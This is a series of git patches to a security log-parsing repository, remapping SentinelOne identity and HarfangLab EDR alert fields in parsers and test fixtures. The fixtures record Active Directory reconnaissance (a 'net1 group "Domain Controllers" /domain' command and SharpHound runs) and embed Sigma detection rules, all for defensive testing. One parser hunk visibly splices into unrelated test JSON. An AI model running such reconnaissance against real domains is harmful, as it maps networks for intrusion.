 process.command_line: "{{json_event.message.process.cmdLine}}"
 process.parent.name: "{{json_event.message.process.parentName}}"
- file.path: "{{json_event.message.process.file.path}}"
- file.name: "{{json_event.message.process.file.path | basename}}"
- file.hash.sha1: "{{json_event.message.process.file.sha1}}"
- file.hash.sha256: "{{json_event.message.process.file.sha256}}"
- file.hash.md5: "{{json_event.message.process.file.md5}}"
+ process.executable: "{{json_event.message.process.file.path}}"
+ process.name: "{{json_event.message.process.file.path | basename}}"
+ process.hash.sha1: "{{json_event.message.process.file.sha1}}"
+ process.hash.sha256: "{{json_event.message.process.file.sha256}}"
+ process.hash.md5: "{{json_event.message.process.file.md5}}"
 sentinelone.identity.id: "{{json_event.message.id}}"
 sentinelone.identity.name: "{{json_event.message.name}}"
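Review bot: The renamed keys move the image path and hashes from `file.*` to `process.*` without any comment recording why, so the next maintainer reading this stage has no way to know that `file.*` is intentionally no longer emitted for this intake; the enclosing `stages:` mapping begins outside the hunk. A one-line comment above `process.executable` would make the intent durable, e.g. `# path/hashes describe the process image itself (ECS process.*); file.* is reserved for files the process acts on`. Detection rules or dashboards built for this intake that keyed on `file.hash.sha256` or `file.path` will silently stop matching once this lands, so the rename is worth stating explicitly in the format's changelog rather than only in the test fixtures.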
diff --git a/SentinelOne/identity/tests/test_alert_1.json b/SentinelOne/identity/tests/test_alert_1.json index 1e8b5bf2b..8d5dcf96a 100644 --- a/SentinelOne/identity/tests/test_alert_1.json +++ b/SentinelOne/identity/tests/test_alert_1.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T05:35:09Z", - "file": { - "hash": { - "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398" - }, - "name": "net1.exe", - "path": "c:\\windows\\system32\\net1.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain" + "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain", + "executable": "c:\\windows\\system32\\net1.exe", + "hash": { + "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398" + }, + "name": "net1.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_11.json b/SentinelOne/identity/tests/test_alert_11.json index a4d81025f..84d64cee6 100644 --- a/SentinelOne/identity/tests/test_alert_11.json +++ b/SentinelOne/identity/tests/test_alert_11.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T08:45:51Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ 
diff --git a/SentinelOne/identity/tests/test_alert_12.json b/SentinelOne/identity/tests/test_alert_12.json index 1618da843..3e75c9e78 100644 --- a/SentinelOne/identity/tests/test_alert_12.json +++ b/SentinelOne/identity/tests/test_alert_12.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T08:45:51Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_13.json b/SentinelOne/identity/tests/test_alert_13.json index a31ef954f..d94a9c18b 100644 --- a/SentinelOne/identity/tests/test_alert_13.json +++ b/SentinelOne/identity/tests/test_alert_13.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T08:45:50Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_14.json b/SentinelOne/identity/tests/test_alert_14.json index 7b9fc10e1..f8a4295bb 100644 
--- a/SentinelOne/identity/tests/test_alert_14.json +++ b/SentinelOne/identity/tests/test_alert_14.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T08:45:50Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_15.json b/SentinelOne/identity/tests/test_alert_15.json index d8a7c1f8a..3d07d62a5 100644 --- a/SentinelOne/identity/tests/test_alert_15.json +++ b/SentinelOne/identity/tests/test_alert_15.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T08:45:50Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_16.json b/SentinelOne/identity/tests/test_alert_16.json index 8a5217a55..0a9dc292d 100644 --- a/SentinelOne/identity/tests/test_alert_16.json +++ b/SentinelOne/identity/tests/test_alert_16.json 
@@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T08:45:50Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_5.json b/SentinelOne/identity/tests/test_alert_5.json index f1339df60..6e14dbe24 100644 --- a/SentinelOne/identity/tests/test_alert_5.json +++ b/SentinelOne/identity/tests/test_alert_5.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T09:54:58Z", - "file": { - "hash": { - "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22" - }, - "name": "cmd.exe", - "path": "c:\\windows\\system32\\cmd.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "\"C:\\Windows\\system32\\cmd.exe\"" + "command_line": "\"C:\\Windows\\system32\\cmd.exe\"", + "executable": "c:\\windows\\system32\\cmd.exe", + "hash": { + "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22" + }, + "name": "cmd.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_6.json b/SentinelOne/identity/tests/test_alert_6.json index e43c64e20..5b987ddc2 100644 --- a/SentinelOne/identity/tests/test_alert_6.json +++ b/SentinelOne/identity/tests/test_alert_6.json 
@@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T09:45:51Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_7.json b/SentinelOne/identity/tests/test_alert_7.json index d4acce26a..6fc5195cb 100644 --- a/SentinelOne/identity/tests/test_alert_7.json +++ b/SentinelOne/identity/tests/test_alert_7.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T09:45:51Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ From e88ee2f227504e1d060cad7568d9bf5a58b31b6c Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Thu, 28 Nov 2024 16:56:30 +0100 Subject: [PATCH 105/150] fix/Harfanglab --- HarfangLab/harfanglab/ingest/parser.yml | 225 ++++++++++++++++++++++- HarfangLab/harfanglab/tests/alert_4.json | 112 +++++++++++ HarfangLab/harfanglab/tests/alert_5.json | 88 +++++++++ 3 files changed, 424 insertions(+), 1 deletion(-) create mode 100644 HarfangLab/harfanglab/tests/alert_4.json create mode 100644 HarfangLab/harfanglab/tests/alert_5.json diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 1376e0758..93671efde 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml 
@@ -29,6 +29,14 @@ pipeline: input_field: "{{json_event.message.event_data.TaskContent}}" output_field: message + - name: parse_task_info_2 + filter: "{{json_event.message.eventlog.event_data.TaskContent != null and ':\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation 
process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch 
-p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. 
All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "event": { + "category": [ + "process" + ], + "dataset": "alert", + "kind": "alert", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-18T09:18:31.558000Z", + "agent": { + "id": "11111111-aaaa-bbbb-cccc-222222222222", + "name": "harfanglab" + }, + "file": { + "hash": { + "md5": "b4e821b2dac20d8d2ac6889f9c3fc315", + "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45" + } + }, + 
"harfanglab": { + "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c", + "alert_subtype": "process", + "alert_time": "2024-11-18T09:18:31.852+00:00", + "alert_unique_id": "11111111-2222-3333-4444-555555555555", + "execution": 0, + "groups": [ + "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "DOMAINSI", + "hostname": "HOST01", + "name": "HOST01", + "os": { + "full": "Windows 10 Pro", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "HOST01" + }, + "process": { + "command_line": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca", + "executable": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe", + "name": "AppInstaller.exe", + "parent": { + "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p", + "executable": "C:\\Windows\\System32\\svchost.exe" + }, + "pe": { + "company": "Microsoft Corporation", + "description": "AppInstaller.exe", + "file_version": "1.24.25180.00000", + "imphash": "714FD4ADFC932C947A3949463867BE18", + "original_file_name": "AppInstaller.exe", + "product": "Microsoft Desktop App Installer" + }, + "pid": 20188, + "working_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\" + }, + "related": { + "hash": [ + "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45", + "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "b4e821b2dac20d8d2ac6889f9c3fc315" + ], + "hosts": [ + "HOST01" + ], + "user": [ + "DOMAINSI\\JDOE" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI 
scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "Package Installed via AppInstaller from the Internet" + }, + "url": { + "domain": "url.integration.com", + "original": "https://url.integration.com/test", + "path": "/test", + "port": 443, + "registered_domain": "integration.com", + "scheme": "https", + "subdomain": "url", + "top_level_domain": "com" + }, + "user": { + "name": "DOMAINSI\\JDOE", + "roles": "DOMAIN_Postes_de_travail_Windows" + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json new file mode 100644 index 000000000..0f68a7c8c --- /dev/null +++ b/HarfangLab/harfanglab/tests/alert_5.json 
@@ -0,0 +1,88 @@ +{ + "input": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the 
Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": 
